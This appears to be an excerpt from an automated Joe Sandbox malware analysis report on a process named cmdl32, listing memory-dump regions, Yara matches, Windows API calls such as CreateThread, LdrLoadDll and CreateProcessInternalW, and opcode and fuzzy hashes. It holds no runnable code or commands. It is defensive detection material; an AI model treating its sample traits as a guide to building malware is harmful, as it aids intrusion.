                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 33828634573a046513f6f395dc59f3550c2c2c76c19ccdafb514b1daef28b056
                                                                                        • Instruction ID: 5d531e98c78c69d605221b84807c39000be2a98ecc790c1cbb8b2d9c60694058
                                                                                        • Opcode Fuzzy Hash: 33828634573a046513f6f395dc59f3550c2c2c76c19ccdafb514b1daef28b056
                                                                                        • Instruction Fuzzy Hash: 0390023124150C43F100B1584408B4610498BE1305F55C027A0225655D8715D9517521
                                                                                        Function 04902DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1eeef839e5b3a3dd7c0aee00ce2d54eb06831c59bebc5f3d810a7ad25c65d51d
                                                                                        • Instruction ID: 482b44daa88b781de858932aedbfb1d6e40b5c871896b13689d95eeb88651d0e
                                                                                        • Opcode Fuzzy Hash: 1eeef839e5b3a3dd7c0aee00ce2d54eb06831c59bebc5f3d810a7ad25c65d51d
                                                                                        • Instruction Fuzzy Hash: 4A900221282545537545F1584408507504A9BE1245795C023A1515951C8626E956E621
                                                                                        Function 04902DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 18c471d727e4af9c795c3a55d53c26781b7010a3d97db1938e01c485873d49d1
                                                                                        • Instruction ID: 2f7c2d628181a58c73b721259672e7c8c0bfc309bcfa072a4ce7a4d56aee92bc
                                                                                        • Opcode Fuzzy Hash: 18c471d727e4af9c795c3a55d53c26781b7010a3d97db1938e01c485873d49d1
                                                                                        • Instruction Fuzzy Hash: CE90023124150813F111B1584508707104D8BD1245F95C423A0525559D9756DA52B121
                                                                                        Function 04902D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7cc4fe2c8aa8fdf2e0ffb371d26d1d5e7910b333a66d95bdae83e3dd1700be4f
                                                                                        • Instruction ID: 55ac6bf089a0961f1f4cb7d27e533210f55540c6470eab755641445a13d8b9d6
                                                                                        • Opcode Fuzzy Hash: 7cc4fe2c8aa8fdf2e0ffb371d26d1d5e7910b333a66d95bdae83e3dd1700be4f
                                                                                        • Instruction Fuzzy Hash: 2F90022925350403F180B158540C60A10498BD2206F95D426A0116559CCA15D9696321
                                                                                        Function 04902D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 66a67a854bd9a8fe5415df6307f51826571cd94125743cdea56f2f273e910be7
                                                                                        • Instruction ID: 5199b4ced04f636d81e871153edf7f4c69d9d142bb9c2b75c3e2414f5ce95524
                                                                                        • Opcode Fuzzy Hash: 66a67a854bd9a8fe5415df6307f51826571cd94125743cdea56f2f273e910be7
                                                                                        • Instruction Fuzzy Hash: AC90022134150403F140B158541C6065049DBE2305F55D022E0515555CDA15D9566222
                                                                                        Function 04902E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 8c8f97cc5e08f9b758b6f7933452d792692ac13e00c8426668c540e670c97d28
                                                                                        • Instruction ID: 1f7970473f8e40de2c5b89550ea06a55899ba405f659090951f2d63a77c0da1a
                                                                                        • Opcode Fuzzy Hash: 8c8f97cc5e08f9b758b6f7933452d792692ac13e00c8426668c540e670c97d28
                                                                                        • Instruction Fuzzy Hash: C390022164150903F101B1584408616104E8BD1245F95C033A1125556ECB25DA92B131
                                                                                        Function 04902EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 33625cf52ef93876f2ee04e0db39ed05376eafe8259d63b0d4121cfa9b749460
                                                                                        • Instruction ID: a472f7803aa1998af675888abe3f14022b2bcd465c59c7faf87ad20ff294c9a8
                                                                                        • Opcode Fuzzy Hash: 33625cf52ef93876f2ee04e0db39ed05376eafe8259d63b0d4121cfa9b749460
                                                                                        • Instruction Fuzzy Hash: BE90026124190803F140B558480860710498BD1306F55C022A2165556E8B29DD517135
                                                                                        Function 04902FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ce18dad848679c8318947f93c3df24be2cecb165f7db9d959e4e746993d75082
                                                                                        • Instruction ID: 848f0794ea80595bc4eedcdb14ee32e2bb5da8e82fa57f2b02cc9e04ed67baa1
                                                                                        • Opcode Fuzzy Hash: ce18dad848679c8318947f93c3df24be2cecb165f7db9d959e4e746993d75082
                                                                                        • Instruction Fuzzy Hash: D6900221641504436140B16888489065049AFE2215755C132A0A99551D8659D9656665
                                                                                        Function 04902FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e57ef1cf908cc32ae23e133ace39ae755f2c64df118ead1eda0d3325154361e9
                                                                                        • Instruction ID: f07087faca845d9dfd26225d6489aa31caa2e82aa707b03cd891d38674b6a9ab
                                                                                        • Opcode Fuzzy Hash: e57ef1cf908cc32ae23e133ace39ae755f2c64df118ead1eda0d3325154361e9
                                                                                        • Instruction Fuzzy Hash: E2900221251D0443F200B5684C18B0710498BD1307F55C126A0255555CCA15D9616521
                                                                                        Function 04902F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4dff1921409cb876ba819f868ba78cc7cd420e960f4384cb12203c797dc69c0b
                                                                                        • Instruction ID: a189b4e790c263318c400959cf46dc1e2757b332b9a42ed5fe06879f8dea9069
                                                                                        • Opcode Fuzzy Hash: 4dff1921409cb876ba819f868ba78cc7cd420e960f4384cb12203c797dc69c0b
                                                                                        • Instruction Fuzzy Hash: 6A90026138150843F100B1584418B061049CBE2305F55C026E1165555D8719DD527126
                                                                                        Function 049039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 058daa21eee955358a6746777c65499be0e61e8160aeb1a6987005fb207289f9
                                                                                        • Instruction ID: 4b29355a0b3e5df13d1ee93f5d6539b4821c92a23acdb9f11fa3a69ea6c0f0d7
                                                                                        • Opcode Fuzzy Hash: 058daa21eee955358a6746777c65499be0e61e8160aeb1a6987005fb207289f9
                                                                                        • Instruction Fuzzy Hash: 2790022128555503F150B15C44086165049ABE1205F55C032A0915595D8655D9557221
                                                                                        Function 04902AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 80888daf7ede224ca18023e165d21d58ea667f20313133bc8a5fd6f274f4ec90
                                                                                        • Instruction ID: 437ba08e0a5dd2eb816c0ea5870d54822d71d0bb975bbd35c1b3a05afeb795f6
                                                                                        • Opcode Fuzzy Hash: 80888daf7ede224ca18023e165d21d58ea667f20313133bc8a5fd6f274f4ec90
                                                                                        • Instruction Fuzzy Hash: 43900225251504032105F5580708507108A8BD6355355C032F1116551CD721D9616121
                                                                                        Function 04902AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 38ccc9eecc082539df1f3308ec1ecf6dec0a73b90fc964509cf45371b9f61635
                                                                                        • Instruction ID: e3315d0ae23d81638c489226e1db7be97d4c933f624858979bcbdf839ee11d3d
                                                                                        • Opcode Fuzzy Hash: 38ccc9eecc082539df1f3308ec1ecf6dec0a73b90fc964509cf45371b9f61635
                                                                                        • Instruction Fuzzy Hash: EA900225261504032145F558060850B14899BD7355395C026F1517591CC721D9656321
                                                                                        Function 04902BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 913846606e8b0c9449f3f482e7db33c9d4733470e731293f65b24156bf0fd6e1
                                                                                        • Instruction ID: 2b3e4e10d5f98226522f1c1cf7bd22bde0d05075f65b3088f651a444eb17455f
                                                                                        • Opcode Fuzzy Hash: 913846606e8b0c9449f3f482e7db33c9d4733470e731293f65b24156bf0fd6e1
                                                                                        • Instruction Fuzzy Hash: 5190023164550C03F150B158441874610498BD1305F55C022A0125655D8755DB5576A1
                                                                                        Function 04902BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 410eb5977c919fe6cdb6fdf4122e7fb7b74f31a359914e8e1df39f434be153fd
                                                                                        • Instruction ID: e2c834e7cd3b7e4dcf712785b745b749cdab3dc1eb468c4ea8f00384039e2705
                                                                                        • Opcode Fuzzy Hash: 410eb5977c919fe6cdb6fdf4122e7fb7b74f31a359914e8e1df39f434be153fd
                                                                                        • Instruction Fuzzy Hash: 2A90023124150C03F180B158440864A10498BD2305F95C026A0126655DCB15DB5977A1
                                                                                        Function 04902BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 33c6d168ca91318d4c55c84a8b3577ab70dad86722f83aee513502125c3a9f92
                                                                                        • Instruction ID: aa908b284009e7ec3c4fda3ca4b54288dfade93e093d2049bd20dadd16760ec2
                                                                                        • Opcode Fuzzy Hash: 33c6d168ca91318d4c55c84a8b3577ab70dad86722f83aee513502125c3a9f92
                                                                                        • Instruction Fuzzy Hash: 2190023124554C43F140B1584408A4610598BD1309F55C022A0165695D9725DE55B661
                                                                                        Function 04902B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9727a457fbbdd22ee55db9de63178806bb77b0b3cbaae121fbfa7db24309755f
                                                                                        • Instruction ID: 1b0c3673b1c60263636ce2f46cc9f53dff702275a397202068d276ddeaec179c
                                                                                        • Opcode Fuzzy Hash: 9727a457fbbdd22ee55db9de63178806bb77b0b3cbaae121fbfa7db24309755f
                                                                                        • Instruction Fuzzy Hash: 9A900261242504036105B1584418616504E8BE1205B55C032E1115591DC625D9917125
                                                                                        Function 0271F029 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        • Opcode ID: 737930d833b7b3d0034b416bae3c968d930d934b7b9fa981cf93fbbf7c06fcb2
                                                                                        • Instruction ID: 71bd27421c489981e7fceea7b55f6fdfe984be78eb9f73d38fb6510ed16ab2a2
                                                                                        • Opcode Fuzzy Hash: 737930d833b7b3d0034b416bae3c968d930d934b7b9fa981cf93fbbf7c06fcb2
                                                                                        • Instruction Fuzzy Hash: 62314FB6A0060AAFDB10DFD8DC809EEB7B9FF88304B108559E515EB214D775EE05CBA1
                                                                                        Function 0271F030 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        • Opcode ID: 604c0382b88cca9b68c1be1dd1bb2f82df49a61857b09a952c1ddb3070113093
                                                                                        • Instruction ID: 64c8cb125a7a1b3bb9cdb9b6460452c8d455bb69da41ef6d7160846d2ce055f6
                                                                                        • Opcode Fuzzy Hash: 604c0382b88cca9b68c1be1dd1bb2f82df49a61857b09a952c1ddb3070113093
                                                                                        • Instruction Fuzzy Hash: 7F3110B6A0060A9FDB00DFD8DC809EFB7B9FF88304B108559E515EB214D775EE458BA1
                                                                                        Function 02709B8A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709BD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: d16ba869818a4b6c5c7832a1bf162d275d47cda4073545c2651d27105117a3ba
                                                                                        • Instruction ID: 24a4290dfb0856d959b8cae233de204c84b0c0179485621985682d484f760337
                                                                                        • Opcode Fuzzy Hash: d16ba869818a4b6c5c7832a1bf162d275d47cda4073545c2651d27105117a3ba
                                                                                        • Instruction Fuzzy Hash: D5F02833A8022476D632B6A85C46FEF66CD8F44761F140115F60CA71C1D956B6094AE9
                                                                                        Function 02714160 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027141D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 98eced4371543c88b8936ebc77b0720b60f507ae4c84dfee4b3ff002cccce43c
                                                                                        • Instruction ID: c8b340d657cba42ecb21ff6df2938cb2b79d82864354c0fbf18f993df19598e1
                                                                                        • Opcode Fuzzy Hash: 98eced4371543c88b8936ebc77b0720b60f507ae4c84dfee4b3ff002cccce43c
                                                                                        • Instruction Fuzzy Hash: B5011EB6E0020DABDF11DAA4DC55FEEB7799F54708F104199E908A7240F631E7188B91
                                                                                        Function 02729230 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02717EEE,00000010,?,?,?,00000044,?,00000010,02717EEE,?,?,?), ref: 0272928D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 77b65a35409a4a11964a2e3a90e4eccdad7d9e73673b21cd3fe8ca59d626e3d6
                                                                                        • Instruction ID: 56a512cd784bd05b92ea9edb36db603bb3878d5427e7b68a4ef88ac281041d95
                                                                                        • Opcode Fuzzy Hash: 77b65a35409a4a11964a2e3a90e4eccdad7d9e73673b21cd3fe8ca59d626e3d6
                                                                                        • Instruction Fuzzy Hash: 00018CB2214108BBCB54DE99DC81EEB77AEEF8C754F418208FA09E7240D630F8518BA4
                                                                                        Function 02709B90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709BD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
